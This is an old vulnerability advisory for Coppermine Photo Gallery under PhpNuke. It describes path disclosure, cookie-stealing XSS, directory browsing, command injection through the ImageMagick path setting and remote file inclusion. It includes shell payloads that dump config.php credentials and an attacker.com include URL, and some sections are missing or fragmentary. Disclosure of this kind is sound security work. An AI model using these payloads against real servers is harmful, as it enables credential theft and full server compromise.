I have tested two versions of the Coppermine: 1.2.2b and 1.2.0 RC4, which i will name further as "new version" and "old version".
Vulnerabilities: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
A. Full path disclosure:
Many scripts in Coppermine software package are not protected against direct access, therefore standard php error messages can be provoked, which leads to exposure the full path to the scripts. Such piece of information has great value for potential attacker, who will use this in next steps of hacking.
Version scope: both new and old versions are affected.
Can be used by potential attacker for stealing cookies and doing other operations, which in normal conditions are not permitted by browser's cross-domain security restrictions.
C. Arbitrary directory browsing (needs nuke admin rights!):
PhpNuke is known by the many security bugs, leading to admin account overtaking by attacker. So needing of the admin rights to use this exploit is not such big restriction ...
Version scope: both new and old versions are affected.
if ($retval) { $ERROR = "Error executing ImageMagick - Return value: $retval"; if ($CONFIG['debug_mode']) {
As we can see, there is very dangerous php function "exec()" in use and some user input - variables "$src_file" and "$dest_file" - are sanitized by "escapeshellarg()". All seems to be ok? Yes... oops... what about config variables "$CONFIG['impath']", "$CONFIG['jpeg_qual']" etc ? Coppermine's authors were assuming, that those variables are safe to use directly in "exec()"... But if we have nuke admin rights, we can manipulate those configuration parameters and therefore various shell commands can be injected to "exec()"! You wanna details? Go to Coopermine's conficuration panel and set "Method for resizing images" to "Image Magick". Next set "Path to ImageMagick" to value, which includes shell command, you want to execute in server. Example "path" in case of windows server: "type config.php > config.txt &" , linux server: "cat config.php > config.txt ;" . Now "save new configuration", then upload some pictures to server and go to "Batch add pictures". And if all went right, then you will see "config.txt" file in phpnuke root directory, so anyone can see in plaintext information with critical value - database name, username and password Of course, skilled attacker can within 5 minutes get remote shell running in server through arbitrary port (higher than 1024) and next hacking is not logged anymore, because webserver is bypassed. One more step - finding and using local r00t exploit - and server is 0wned
E. Remote file inclusion:
Version scope: both new and old versions are affected (different bugs in different scripts).
There exists remote file inclusion vulnerabilities in Coppermine Photo Gallery, which can lead to arbitrary php code parsing, shell commands injection, etc. And as discussed before, finally this can lead to total compromise of the victim server.
E1 - affected is old version:
First get ready your php script in "http://attacker.com/include/functions.inc.php" and then:
